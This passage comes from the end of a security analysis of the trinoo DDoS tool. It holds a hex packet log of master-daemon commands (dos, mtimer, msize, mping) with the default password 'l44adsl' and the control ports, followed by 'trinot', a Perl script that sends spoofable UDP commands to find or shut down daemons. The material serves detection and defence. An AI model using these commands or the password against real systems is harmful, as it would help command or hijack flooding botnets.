  0a 45 6e 64 2e 20 31 20 42 63 61 73 74 73 20 74       .End. 1 Bcasts t
##
T 192.168.100.1:1074 -> 10.0.0.1:27665 [AP]
  6d 74 69 6d 65 72 20 31 30 30 30 0d 0a                mtimer 1000..
##
T 10.0.0.1:27665 -> 192.168.100.1:1074 [AP]
  6d 74 69 6d 65 72 3a 20 53 65 74 74 69 6e 67 20       mtimer: Setting 
  74 69 6d 65 72 20 6f 6e 20 62 63 61 73 74 20 74       timer on bcast t
  6f 20 31 30 30 30 2e 0a                               o 1000..
#
U 10.0.0.1:... -> 192.168.0.1:27444
  62 62 62 20 6c 34 34 61 64 73 6c 20 31 30 30 30       bbb l44adsl 1000
##
T 10.0.0.1:27665 -> 192.168.100.1:1074 [AP]
  6d 74 69 6d 65 72 3a 20 53 65 74 74 69 6e 67 20       mtimer: Setting 
  74 69 6d 65 72 20 6f 6e 20 62 63 61 73 74 20 74       timer on bcast t
  6f 20 31 30 30 30 2e 0a                               o 1000..
###
T 10.0.0.1:27665 -> 192.168.100.1:1074 [AP]
###
T 192.168.100.1:1074 -> 10.0.0.1:27665 [AP]
  6d 73 69 7a 65 20 33 32 30 30 30 0d 0a                msize 32000..
#
U 10.0.0.1:... -> 192.168.0.1:27444
  72 73 7a 20 33 32 30 30 30                            rsz 32000
#
T 10.0.0.1:27665 -> 192.168.100.1:1074 [AP]
###
T 192.168.100.1:1074 -> 10.0.0.1:27665 [AP]
  64 6f 73 20 32 31 36 2e 31 36 30 2e 58 58 2e 59       dos 216.160.XX.Y
  59 0d 0a                                              Y..
#
T 10.0.0.1:27665 -> 192.168.100.1:1074 [AP]
  44 6f 53 3a 20 50 61 63 6b 65 74 69 6e 67 20 32       DoS: Packeting 2
  31 36 2e 31 36 30 2e 58 58 2e 59 59 2e 0a             16.160.XX.YY..
#
U 10.0.0.1:... -> 192.168.0.1:27444
  61 61 61 20 6c 34 34 61 64 73 6c 20 32 31 36 2e       aaa l44adsl 216.
  31 36 30 2e 58 58 2e 59 59                            160.XX.YY
#
T 10.0.0.1:27665 -> 192.168.100.1:1074 [AP]
##
T 192.168.100.1:1074 -> 10.0.0.1:27665 [AP]
  71 75 69 74 0d 0a                                     quit..
#
T 10.0.0.1:27665 -> 192.168.100.1:1074 [AP]
  62 79 65 20 62 79 65 2e 0a                            bye bye..
###
T 192.168.100.1:1075 -> 10.0.0.1:27665 [AP]
  62 65 74 61 61 6c 6d 6f 73 74 64 6f 6e 65 0d 0a       betaalmostdone..
##
T 10.0.0.1:27665 -> 192.168.100.1:1075 [AP]
  74 72 69 6e 6f 6f 20 76 31 2e 30 37 64 32 2b 66       trinoo v1.07d2+f
  33 2b 63 2e 2e 5b 72 70 6d 38 64 2f 63 62 34 53       3+c..[rpm8d/cb4S
  78 2f 5d 0a 0a 0a                                     x/]...
###
T 10.0.0.1:27665 -> 192.168.100.1:1075 [AP]
###
T 192.168.100.1:1075 -> 10.0.0.1:27665 [AP]
  6d 70 69 6e 67 0d 0a                                  mping..
##
T 10.0.0.1:27665 -> 192.168.100.1:1075 [AP]
  6d 70 69 6e 67 3a 20 53 65 6e 64 69 6e 67 20 61       mping: Sending a
  20 50 49 4e 47 20 74 6f 20 65 76 65 72 79 20 42        PING to every B
  63 61 73 74 73 2e 0a                                  casts..
#
U 10.0.0.1:... -> 192.168.0.1:27444
  70 6e 67 20 6c 34 34 61 64 73 6c                      png l44adsl
##
U 192.168.0.1:... -> 10.0.0.1:31335
  50 4f 4e 47                                           PONG
##
T 10.0.0.1:27665 -> 192.168.100.1:1075 [AP]
  50 4f 4e 47 20 31 20 52                               PONG 1 R
  65 63 65 69 76 65 64 20 66 72 6f 6d 20 31 39 32       eceived from 192
  2e 31 36 38 2e 30 2e 31 0a                            .168.0.1.
##
T 192.168.100.1:1075 -> 10.0.0.1:27665 [AP]
  71 75 69 74 0d 0a                                     quit..
#
T 10.0.0.1:27665 -> 192.168.100.1:1075 [AP]
  62 79 65 20 62 79 65 2e 0a                            bye bye..


Appendix B: trinot script

------------------------------- cut here -----------------------------------
#!/usr/bin/perl -w
#
# trinot v. 1.1
# By Dave Dittrich
#
# Send commands to trinoo daemon(s), causing them to PONG, *HELLO*
# to all their masters, exit, etc. Using this program (and knowledge
# of the proper daemon password), you can affect trinoo daemons
# externally and monitor packets to verify if the daemons are up,
# expose their masters, or shut them down.
#
# Needs Net::RawIP (http://quake.skif.net/RawIP)
# Requires libpcap (ftp://ftp.ee.lbl.gov/libpcap.tar.Z)
#
# Example: ./trinot host1 [host2 [...]]
#          ./trinot -S host
#          ./trinot -p password -P host
#
# (This code was hacked from the "macof" program, written by
# Ian Vitek)

use Getopt::Std;        # getopts() from Getopt::Std replaces the old getopts.pl
use Net::RawIP;

# Raw IP packet object with an empty UDP header, filled in per target host.
$a = Net::RawIP->new({udp => {}});
chomp($hostname = `hostname`);

getopts('PSDp:f:s:d:l:i:e:vh');
die "usage: $0 [options] host1 [host2 [...]]
\t-P\t\t\tSend \"png\" command
\t-S\t\t\tSend \"shi\" command
\t-D\t\t\tSend \"d1e\" command (default)
\t-p password\t\t(default: \"l44adsl\")
\t-f from_host\t\t(default: $hostname)
\t-s src_port\t\t(default: random)
\t-d dest_port\t\t(default: 27444)
\t-l ipfile\t\tSend to IP addresses in ipfile
\t-i interface\t\tSet sending interface (default: eth0)
\t-e dest_mac\t\tSet destination MAC address (default: interface default)
\t-v\t\t\tVerbose
\t-h\t\t\tThis help\n" if $opt_h || (!@ARGV && !$opt_l);

# set default values
$opt_i  = ($opt_i) ? $opt_i : "eth0";
$s_port = ($opt_s) ? $opt_s : int rand 65535;
$d_port = ($opt_d) ? $opt_d : 27444;
$pass   = ($opt_p) ? $opt_p : "l44adsl";

# choose network card (optionally with a fixed destination MAC)
if ($opt_e) {
  $a->ethnew($opt_i, dest => $opt_e);
} else {
  $a->ethnew($opt_i);
}

# daemon command line: "<command> <password>"
$cmd = ($opt_P) ? "png $pass" :
       ($opt_S) ? "shi $pass" :
       ($opt_D) ? "d1e $pass" :
                  "d1e $pass";

$s_host = ($opt_f) ? $opt_f : $hostname;

# read further target addresses, one per line, from the -l file
if ($opt_l) {
  open(I, "<$opt_l") || die "could not open file: '$opt_l'";
  while (<I>) {
    chomp;
    push(@ARGV, $_) if length;
  }
  close(I);
}

foreach $d_host (@ARGV) {
  $a->set({ip  => {saddr => $s_host, daddr => $d_host},
           udp => {source => $s_port, dest => $d_port, data => $cmd}});
  print "sending '$cmd' to $d_host\n" if $opt_v;
  $a->send;
}

exit(0);
------------------------------- cut here -----------------------------------
Appendix C: references

TCP/IP Illustrated, Vol. I, II, and III. W. Richard Stevens and Gary R. Wright, Addison-Wesley.

lsof:
ftp://vic.cc.purdue.edu/pub/tools/unix/lsof/

tcpdump:
ftp://ftp.ee.lbl.gov/tcpdump.tar.Z
